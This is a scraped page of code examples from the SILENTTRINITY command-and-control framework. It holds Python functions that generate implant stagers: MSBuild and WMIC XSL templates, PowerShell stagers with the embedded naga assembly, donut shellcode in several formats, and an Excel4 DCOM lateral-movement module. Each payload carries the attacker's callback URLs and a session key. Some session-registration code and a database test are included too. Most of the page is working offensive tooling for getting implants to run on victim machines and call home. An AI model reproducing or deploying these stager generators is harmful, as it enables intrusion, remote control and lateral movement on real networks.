コード例 #1
    def generate(self, listener):
        """Render the MSBuild stager template for *listener*.

        Returns a ``(guid, psk, template)`` tuple: a fresh ``uuid.uuid4()``,
        a PSK from ``gen_stager_psk()``, and the template text with the
        GUID/PSK/URLS/NAME_GOES_HERE/BASE64_ENCODED_ASSEMBLY placeholders
        substituted. Both the GUID and the PSK are written into the rendered
        text verbatim, so the output is as sensitive as the PSK itself.
        """
        assembly_path = get_path_in_package('core/teamserver/data/naga.exe')
        template_path = get_path_in_package(
            'core/teamserver/stagers/templates/msbuild.xml')
        with open(assembly_path, 'rb') as assembly_file, \
                open(template_path) as template_file:
            guid = uuid.uuid4()
            psk = gen_stager_psk()

            # A falsy 'CallBackURls' entry is dropped by filter(None, ...).
            endpoints = [
                f"{listener.name}://{listener['BindIP']}:{listener['Port']}",
                listener['CallBackURls'],
            ]
            c2_urls = ','.join(filter(None, endpoints))

            rendered = template_file.read()
            # Applied in this order; later replacements also see the values
            # inserted by earlier ones, exactly as the chained replace() did.
            substitutions = (
                ('GUID', str(guid)),
                ('PSK', psk),
                ('URLS', c2_urls),
                ("NAME_GOES_HERE", gen_random_string_no_digits(5)),
                ("BASE64_ENCODED_ASSEMBLY",
                 dotnet_deflate_and_encode(assembly_file.read())),
            )
            for placeholder, value in substitutions:
                rendered = rendered.replace(placeholder, value)
            return guid, psk, rendered
コード例 #2
    def generate(self, listener):
        """Build shellcode for *listener* with donut and return it as hex.

        Returns ``(guid, psk, shellcode)`` where ``shellcode`` is the string
        produced by ``shellcode_to_hex_string``. The GUID, PSK and the
        comma-joined URL list are handed to donut as its ``;``-separated
        ``params`` string.
        """
        naga_path = get_path_in_package('core/teamserver/data/naga.exe')
        # The handle is opened but never read; it is kept so a missing
        # assembly fails here rather than inside donut.create.
        with open(naga_path, 'rb'):
            guid = uuid.uuid4()
            psk = gen_stager_psk()

            c2_urls = ','.join(filter(None, [
                f"{listener.name}://{listener['BindIP']}:{listener['Port']}",
                listener['CallBackURls'],
            ]))

            # donut arch codes: 1 = x86, 2 = x64; anything else maps to 3
            # (donut's dual x86+x64 mode), which is the default here.
            requested = self.options['Architecture']['Value']
            arch = 2 if requested == 'x64' else 1 if requested == 'x86' else 3

            donut_shellcode = donut.create(
                file=get_path_in_package('core/teamserver/data/naga.exe'),
                params=f"{guid};{psk};{c2_urls}",
                arch=arch)

            return guid, psk, shellcode_to_hex_string(donut_shellcode)
コード例 #3
    def generate(self, listener):
        """Return the raw ``naga.exe`` bytes as a latin-1 decoded string.

        *listener* is accepted for interface parity with the other stagers
        but is not used. The returned ``(guid, psk, body)`` carries a freshly
        generated GUID and PSK that are not embedded in ``body``.
        """
        exe_path = get_path_in_package('core/teamserver/data/naga.exe')
        with open(exe_path, 'rb') as exe_file:
            guid = uuid.uuid4()
            psk = gen_stager_psk()
            # latin-1 maps every byte to exactly one code point, so the
            # binary survives the bytes -> str conversion losslessly.
            body = exe_file.read().decode('latin-1')
        return guid, psk, body
コード例 #4
    def payload(self):
        """Render the ``excel4dcom.boo`` module source for the chosen listener.

        Resolves the listener named by ``options['Listener']`` over IPC,
        registers a new (guid, psk) session, builds donut shellcode for the
        selected architecture and substitutes the SHELLCODE/TARGET/ARCH
        placeholders in the module template. Returns the rendered source, or
        ``None`` (after ``print_bad``) when no such listener exists.
        """
        listener = ipc_server.publish_event(
            Events.GET_LISTENERS, (self.options['Listener']['Value'], ))
        if not listener:
            print_bad(
                f"Listener '{self.options['Listener']['Value']}' not found!")
            return None

        c2_urls = ','.join(filter(None, [
            f"{listener.name}://{listener['BindIP']}:{listener['Port']}",
            listener['CallBackURls'],
        ]))

        guid = uuid.uuid4()
        psk = gen_stager_psk()
        # Registration happens before the shellcode is built, so a failure
        # further down still leaves this session registered.
        ipc_server.publish_event(Events.SESSION_REGISTER, (guid, psk))

        arch_option = self.options['Architecture']['Value']
        donut_shellcode = donut.create(
            file=get_path_in_package('core/teamserver/data/naga.exe'),
            params=f"{guid};{psk};{c2_urls}",
            arch=2 if arch_option == 'x64' else 1)
        shellcode = shellcode_to_hex_byte_array(donut_shellcode)

        module_path = get_path_in_package(
            'core/teamserver/modules/boo/src/excel4dcom.boo')
        with open(module_path) as module_src:
            rendered = module_src.read()
        # Same order as before: TARGET is substituted before ARCH.
        for placeholder, value in (('SHELLCODE', shellcode),
                                   ('TARGET', self.options['Target']['Value']),
                                   ('ARCH', arch_option)):
            rendered = rendered.replace(placeholder, value)
        return rendered
コード例 #5
    def register(self, guid, psk):
        """Register a session, minting a GUID and/or PSK when not supplied.

        Falsy *guid* / *psk* values are replaced by ``uuid.uuid4()`` and
        ``gen_stager_psk()``. The GUID is passed to ``self.guid_is_valid``
        (whose return value is not inspected) and the pair is then stored
        via ``self._register``. Returns ``{"guid": <str>, "psk": psk}``.
        """
        guid = guid or uuid.uuid4()
        psk = psk or gen_stager_psk()

        # Only an exception from guid_is_valid can stop registration; a
        # False return would be ignored here.
        self.guid_is_valid(guid)
        self._register(guid, psk)
        return {"guid": str(guid), "psk": psk}
コード例 #6
ファイル: sessions.py プロジェクト: undercl0ck/SILENTTRINITY
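    def register(self, guid, psk):
        """Register a session, minting a GUID and/or PSK when not supplied.

        Args:
            guid: Session identifier. Any falsy value is replaced by a fresh
                ``uuid.uuid4()``; otherwise ``str(guid)`` must parse as a UUID.
            psk: Pre-shared key. Any falsy value is replaced by
                ``gen_stager_psk()``.

        Returns:
            ``{"guid": <str>, "psk": psk}`` for the stored pair.

        Raises:
            CmdError: if ``guid`` does not parse as a UUID.
        """
        guid = guid or uuid.uuid4()
        psk = psk or gen_stager_psk()

        try:
            uuid.UUID(str(guid))
        except ValueError as err:
            # Chain the parser's error so the reason for rejection is kept
            # in the traceback instead of being discarded.
            raise CmdError("Invalid Guid") from err

        self._register(guid, psk)
        return {"guid": str(guid), "psk": psk}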
コード例 #7
    def generate(self, listener):
        """Render the WMIC XSL stager template for *listener*.

        Only the ``C2_URL`` placeholder is substituted. The returned
        ``(guid, psk, template)`` carries a fresh GUID and PSK that are not
        written into this template.
        """
        template_path = get_path_in_package(
            'core/teamserver/stagers/templates/wmic.xsl')
        with open(template_path) as template_file:
            endpoints = [
                f"{listener.name}://{listener['BindIP']}:{listener['Port']}",
                listener['CallBackURls'],
            ]
            c2_urls = ','.join(filter(None, endpoints))

            guid = uuid.uuid4()
            psk = gen_stager_psk()

            rendered = template_file.read().replace("C2_URL", c2_urls)
        return guid, psk, rendered
コード例 #8
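def test_database_ops():
    """Round-trip a session through add_session / get_session_psk / get_sessions.

    Uses a fresh GUID and PSK against ``STDatabase`` opened on
    ``TEST_DB_PATH``. Adding the same guid/psk pair a second time must be a
    silent no-op that returns ``None`` instead of raising.
    """
    guid = uuid.uuid4()
    psk = gen_stager_psk()
    with STDatabase(db_path=TEST_DB_PATH) as db:
        assert db.add_session(guid, psk) == psk

        # Re-adding an existing guid/psk pair must not error out.
        # Identity comparison: `== None` is flagged by linters (E711).
        assert db.add_session(guid, psk) is None

        assert db.get_session_psk(guid) == psk

        sessions = db.get_sessions()
        assert len(sessions) == 1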
コード例 #9
ファイル: posh.py プロジェクト: zpaav/SILENTTRINITY
    def generate(self, listener):
        """Render the PowerShell stager template for *listener*.

        Returns ``(guid, psk, template)``. When ``AsFunction`` is set, the
        rendered script is wrapped in an ``Invoke-<RANDOM>`` function that is
        immediately invoked with the GUID, PSK and URL list; otherwise the
        ``$Url`` / ``$Guid`` / ``$Psk`` tokens are replaced by double-quoted
        literals. In both cases the PSK appears verbatim in the output.
        """
        with open(get_path_in_package('core/teamserver/data/naga.exe'),
                  'rb') as assembly:
            with open(
                    get_path_in_package(
                        'core/teamserver/stagers/templates/posh.ps1')
            ) as template:
                # From here on `template` is the file's text, not the handle.
                template = template.read()
                c2_urls = ','.join(
                    filter(None, [
                        f"{listener.name}://{listener['BindIP']}:{listener['Port']}",
                        listener['CallBackURls']
                    ]))

                guid = uuid.uuid4()
                psk = gen_stager_psk()

                template = template.replace("ARGS_NAME", gen_random_string(6))
                # NOTE(review): bool() of any non-empty string is True, so a
                # string option value such as 'False' would still take this
                # branch -- confirm the option is stored as a real bool.
                if bool(self.options['AsFunction']['Value']) is True:
                    function_name = gen_random_string(6).upper()
                    template = f"""function Invoke-{function_name}
{{
    [CmdletBinding()]
    param (
        [Parameter(Mandatory=$true)][String]$Guid,
        [Parameter(Mandatory=$true)][String]$Psk,
        [Parameter(Mandatory=$true)][String]$Url
    )

    {template}
}}
Invoke-{function_name} -Guid '{guid}' -Psk '{psk}' -Url '{c2_urls}'
"""
                else:
                    template = template.replace("$Url", f'"{c2_urls}"')
                    template = template.replace("$Guid", f'"{guid}"')
                    template = template.replace("$Psk", f'"{psk}"')

                # `assembly` is rebound from the file handle to its bytes.
                assembly = assembly.read()
                template = template.replace(
                    "BASE64_ENCODED_ASSEMBLY",
                    dotnet_deflate_and_encode(assembly))
                # DATA_LENGTH is the raw assembly byte count, not the length
                # of the encoded form inserted above.
                template = template.replace("DATA_LENGTH", str(len(assembly)))
                return guid, psk, template
コード例 #10
    def generate(self, listener):
        """Build donut shellcode for *listener* in the selected output format.

        Returns ``(guid, psk, shellcode)``. ``Format`` selects the encoding:
        ``'raw'`` returns the bytes decoded as latin-1, ``'int'`` and
        ``'hex'`` return the ``shellcode_to_int_byte_array`` /
        ``shellcode_to_hex_byte_array`` renderings. Any other ``Format``
        value matches no branch and the method returns ``None``.
        """

        guid = uuid.uuid4()
        psk = gen_stager_psk()

        c2_urls = ','.join(
            filter(None, [f"{listener.name}://{listener['BindIP']}:{listener['Port']}", listener['CallBackURls']])
            )

        #Determine which architecture to use.
        #Default is amd64+86 (dual-mode)
        arch = 3

        #User can specify 64-bit or 32-bit
        if self.options['Architecture']['Value'] == 'x64':
            arch = 2
        elif self.options['Architecture']['Value'] == 'x86':
            arch = 1

        # Create the shellcode using donut
        donut_shellcode = donut.create(file=get_path_in_package('core/teamserver/data/naga.exe'), params=f"{guid};{psk};{c2_urls}", arch=arch)

        if self.options['Format']['Value'] == 'raw':
                # NOTE(review): the bytes are written to "shellcode.bin"
                # relative to the current working directory but read back via
                # get_path_in_package('../shellcode.bin'); those resolve to the
                # same file only when the CWD is the package's parent -- confirm.
                # Also: `f` is never closed if write() raises, and the finally
                # clause removes the CWD-relative file even when open() failed,
                # which would raise FileNotFoundError on its own.
                try:
                    f = open("shellcode.bin", "wb")
                    f.write(donut_shellcode)
                    f.close()
                    with open(get_path_in_package('../shellcode.bin'), 'rb') as bin:
                         return guid, psk, bin.read().decode('latin-1')
                finally:
                     os.remove("shellcode.bin")

        elif self.options['Format']['Value'] == 'int':
            shellcode = shellcode_to_int_byte_array(donut_shellcode)
            return guid, psk, shellcode

        elif self.options['Format']['Value'] == 'hex':
            shellcode = shellcode_to_hex_byte_array(donut_shellcode)
            return guid, psk, shellcode
コード例 #11
    def generate(self, listener):
        """Render the stageless PowerShell template for *listener*.

        Embeds the four Boo.Lang assemblies (deflated and encoded by
        ``dotnet_deflate_and_encode``) plus the stager source from
        ``gen_stager_code`` into ``posh_stageless.ps1``. Returns
        ``(guid, psk, template)``; with ``AsFunction`` set the script is
        wrapped in an ``Invoke-<RANDOM>`` function and invoked with the GUID,
        PSK and URL list, otherwise the ``$Url`` / ``$Guid`` / ``$Psk`` tokens
        are replaced by the bare (unquoted) values.
        """
        with open(get_path_in_package('core/teamserver/data/Boo.Lang.dll'),
                  'rb') as boolangdll:
            with open(
                    get_path_in_package(
                        'core/teamserver/data/Boo.Lang.Compiler.dll'),
                    'rb') as boolangcompilerdll:
                with open(
                        get_path_in_package(
                            'core/teamserver/data/Boo.Lang.Parser.dll'),
                        'rb') as boolangparserdll:
                    with open(
                            get_path_in_package(
                                'core/teamserver/data/Boo.Lang.Extensions.dll'
                            ), 'rb') as boolangextensionsdll:
                        with open(
                                get_path_in_package(
                                    'core/teamserver/stagers/templates/posh_stageless.ps1'
                                )) as template:
                            # From here on `template` is the text, not the handle.
                            template = template.read()

                            c2_urls = ','.join(
                                filter(None, [
                                    f"{listener.name}://{listener['BindIP']}:{listener['Port']}",
                                    listener['CallBackURls']
                                ]))
                            guid = uuid.uuid4()
                            psk = gen_stager_psk()

                            # NOTE(review): bool() of any non-empty string is
                            # True, so a string value such as 'False' would
                            # still take this branch -- confirm the option is
                            # stored as a real bool.
                            if bool(self.options['AsFunction']
                                    ['Value']) is True:
                                function_name = gen_random_string(6).upper()
                                template = f"""function Invoke-{function_name}
{{
    [CmdletBinding()]
    param (
        [Parameter(Mandatory=$true)][String]$Guid,
        [Parameter(Mandatory=$true)][String]$Psk,
        [Parameter(Mandatory=$true)][String]$Url
    )

    {template}
}}
Invoke-{function_name} -Guid '{guid}' -Psk '{psk}' -Url '{c2_urls}'
"""
                            else:
                                # Values are inserted without surrounding quotes.
                                template = template.replace(
                                    "$Url", f'{c2_urls}')
                                template = template.replace("$Guid", f'{guid}')
                                template = template.replace("$Psk", f'{psk}')

                            template = template.replace(
                                "BOOLANG_DLL_GOES_HERE",
                                dotnet_deflate_and_encode(boolangdll.read()))
                            template = template.replace(
                                "BOOLANGPARSER_DLL_GOES_HERE",
                                dotnet_deflate_and_encode(
                                    boolangparserdll.read()))
                            template = template.replace(
                                "BOOLANGCOMPILER_DLL_GOES_HERE",
                                dotnet_deflate_and_encode(
                                    boolangcompilerdll.read()))
                            template = template.replace(
                                "BOOLANGEXTENSIONS_DLL_GOES_HERE",
                                dotnet_deflate_and_encode(
                                    boolangextensionsdll.read()))
                            # The comms list comes from the listener's
                            # comma-separated 'comms' field.
                            template = template.replace(
                                "SOURCE_CODE_GOES_HERE",
                                gen_stager_code(
                                    listener['comms'].split(','),
                                    hook_assemblyresolve_event=True))
                            return guid, psk, template